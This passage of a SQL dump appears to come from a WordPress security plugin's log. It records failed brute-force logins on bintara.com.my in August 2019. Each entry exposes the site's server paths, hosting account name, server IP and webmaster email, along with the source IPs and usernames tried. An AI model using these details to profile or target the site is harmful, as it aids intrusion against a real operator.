empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:0:\"\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:38:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:2:\"86\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"REMOTE_ADDR\";s:14:\"122.116.216.17\";s:11:\"REMOTE_PORT\";s:5:\"55832\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:53:\"/home/norfaiz/public_html/bintara.com.my/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:10:\"SCRIPT_URI\";s:35:\"https://bintara.com.my/wp-login.php\";s:10:\"SCRIPT_URL\";s:13:\"/wp-login.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XWUl9rpOXTPHADnstsgVxQAAABE\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1566909942.5314\";s:12:\"REQUEST_TIME\";s:10:\"1566909942\";}}','notice','2019-08-27 12:45:43','2019-08-27 12:45:42',17680320,19171976,'https://bintara.com.my/wp-login.php',1,0,'122.116.216.17'),(23442,0,'brute_force','invalid-login','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:12:\"wp-login.php\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_username\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The username field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:0:\"\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:38:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:2:\"86\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"REMOTE_ADDR\";s:13:\"27.71.226.251\";s:11:\"REMOTE_PORT\";s:5:\"35604\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:53:\"/home/norfaiz/public_html/bintara.com.my/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:10:\"SCRIPT_URI\";s:35:\"https://bintara.com.my/wp-login.php\";s:10:\"SCRIPT_URL\";s:13:\"/wp-login.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XWUqgw0@TGWC-1tzGX6QVgAAAJc\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1566911107.9369\";s:12:\"REQUEST_TIME\";s:10:\"1566911107\";}}','notice','2019-08-27 13:05:09','2019-08-27 13:05:08',17685360,19176632,'https://bintara.com.my/wp-login.php',1,0,'27.71.226.251'),(23443,0,'brute_force','invalid-login','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:12:\"wp-login.php\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_username\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The username field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:0:\"\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:38:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:2:\"86\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"REMOTE_ADDR\";s:14:\"185.104.28.127\";s:11:\"REMOTE_PORT\";s:5:\"41514\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:53:\"/home/norfaiz/public_html/bintara.com.my/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:10:\"SCRIPT_URI\";s:35:\"https://bintara.com.my/wp-login.php\";s:10:\"SCRIPT_URL\";s:13:\"/wp-login.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XWUstM-brxCl71gpwvAApAAAAFM\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";s:14:\"1566911668.939\";s:12:\"REQUEST_TIME\";s:10:\"1566911668\";}}','notice','2019-08-27 13:14:30','2019-08-27 13:14:29',17685456,19175888,'https://bintara.com.my/wp-login.php',1,0,'185.104.28.127'),(23444,0,'brute_force','invalid-login','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:12:\"wp-login.php\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_username\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The username field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:0:\"\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:38:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:2:\"86\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"REMOTE_ADDR\";s:13:\"134.209.38.25\";s:11:\"REMOTE_PORT\";s:5:\"53704\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:53:\"/home/norfaiz/public_html/bintara.com.my/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:10:\"SCRIPT_URI\";s:35:\"https://bintara.com.my/wp-login.php\";s:10:\"SCRIPT_URL\";s:13:\"/wp-login.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XWUxu7pOXTPHADnstsgdMgAAAAY\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1566912955.9344\";s:12:\"REQUEST_TIME\";s:10:\"1566912955\";}}','notice','2019-08-27 13:35:57','2019-08-27 13:35:56',17681552,19172560,'https://bintara.com.my/wp-login.php',1,0,'134.209.38.25'),(23445,0,'brute_force','invalid-login','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:12:\"wp-login.php\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_username\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The username field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:0:\"\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:38:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:2:\"90\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"REMOTE_ADDR\";s:13:\"167.71.32.246\";s:11:\"REMOTE_PORT\";s:5:\"46262\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:53:\"/home/norfaiz/public_html/bintara.com.my/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:10:\"SCRIPT_URI\";s:35:\"https://bintara.com.my/wp-login.php\";s:10:\"SCRIPT_URL\";s:13:\"/wp-login.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XWU2Ds-brxCl71gpwvAGZAAAAE0\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1566914062.8953\";s:12:\"REQUEST_TIME\";s:10:\"1566914062\";}}','notice','2019-08-27 13:54:24','2019-08-27 13:54:23',17684904,19174408,'https://bintara.com.my/wp-login.php',1,0,'167.71.32.246'),(23446,0,'brute_force','invalid-login','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:12:\"wp-login.php\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_username\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The username field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:0:\"\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:38:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:2:\"92\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"REMOTE_ADDR\";s:11:\"88.99.33.18\";s:11:\"REMOTE_PORT\";s:5:\"36002\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:53:\"/home/norfaiz/public_html/bintara.com.my/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:10:\"SCRIPT_URI\";s:35:\"https://bintara.com.my/wp-login.php\";s:10:\"SCRIPT_URL\";s:13:\"/wp-login.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XWU4FrpOXTPHADnstsgeNgAAABg\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1566914582.9318\";s:12:\"REQUEST_TIME\";s:10:\"1566914582\";}}','notice','2019-08-27 14:03:04','2019-08-27 14:03:03',17685024,19176136,'https://bintara.com.my/wp-login.php',1,0,'88.99.33.18'),(23447,0,'brute_force','invalid-login::username-demo','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:6:\"xmlrpc\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_password\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The password field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:4:\"demo\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:37:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:11:\"/xmlrpc.php\";s:14:\"CONTENT_LENGTH\";s:3:\"472\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"REMOTE_ADDR\";s:11:\"88.99.33.18\";s:11:\"REMOTE_PORT\";s:5:\"36706\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:51:\"/home/norfaiz/public_html/bintara.com.my/xmlrpc.php\";s:11:\"SCRIPT_NAME\";s:11:\"/xmlrpc.php\";s:10:\"SCRIPT_URI\";s:33:\"https://bintara.com.my/xmlrpc.php\";s:10:\"SCRIPT_URL\";s:11:\"/xmlrpc.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XWU4Gc-brxCl71gpwvAHfAAAAFE\";s:8:\"PHP_SELF\";s:11:\"/xmlrpc.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1566914585.7637\";s:12:\"REQUEST_TIME\";s:10:\"1566914585\";}}','notice','2019-08-27 14:03:07','2019-08-27 14:03:06',18201240,19500632,'https://bintara.com.my/xmlrpc.php',1,0,'88.99.33.18'),(23448,0,'brute_force','invalid-login','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:12:\"wp-login.php\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_username\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The username field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:0:\"\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:38:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:2:\"92\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"REMOTE_ADDR\";s:13:\"216.10.242.46\";s:11:\"REMOTE_PORT\";s:5:\"57874\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:53:\"/home/norfaiz/public_html/bintara.com.my/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:10:\"SCRIPT_URI\";s:35:\"https://bintara.com.my/wp-login.php\";s:10:\"SCRIPT_URL\";s:13:\"/wp-login.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XWU6Ns-brxCl71gpwvAIQwAAAFU\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1566915126.8259\";s:12:\"REQUEST_TIME\";s:10:\"1566915126\";}}','notice','2019-08-27 14:12:08','2019-08-27 14:12:07',17684744,19176224,'https://bintara.com.my/wp-login.php',1,0,'216.10.242.46'),(23449,0,'brute_force','invalid-login::username-admin','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:6:\"xmlrpc\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_password\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The password field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:5:\"admin\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:37:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:11:\"/xmlrpc.php\";s:14:\"CONTENT_LENGTH\";s:3:\"473\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"REMOTE_ADDR\";s:13:\"216.10.242.46\";s:11:\"REMOTE_PORT\";s:5:\"58220\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:51:\"/home/norfaiz/public_html/bintara.com.my/xmlrpc.php\";s:11:\"SCRIPT_NAME\";s:11:\"/xmlrpc.php\";s:10:\"SCRIPT_URI\";s:33:\"https://bintara.com.my/xmlrpc.php\";s:10:\"SCRIPT_URL\";s:11:\"/xmlrpc.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XWU6Oc-brxCl71gpwvAIRQAAAEs\";s:8:\"PHP_SELF\";s:11:\"/xmlrpc.php\";s:18:\"REQUEST_TIME_FLOAT\";s:14:\"1566915129.315\";s:12:\"REQUEST_TIME\";s:10:\"1566915129\";}}','notice','2019-08-27 14:12:10','2019-08-27 14:12:09',18200944,19498016,'https://bintara.com.my/xmlrpc.php',1,0,'216.10.242.46'),(23450,0,'brute_force','invalid-login','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:12:\"wp-login.php\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_username\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The username field is 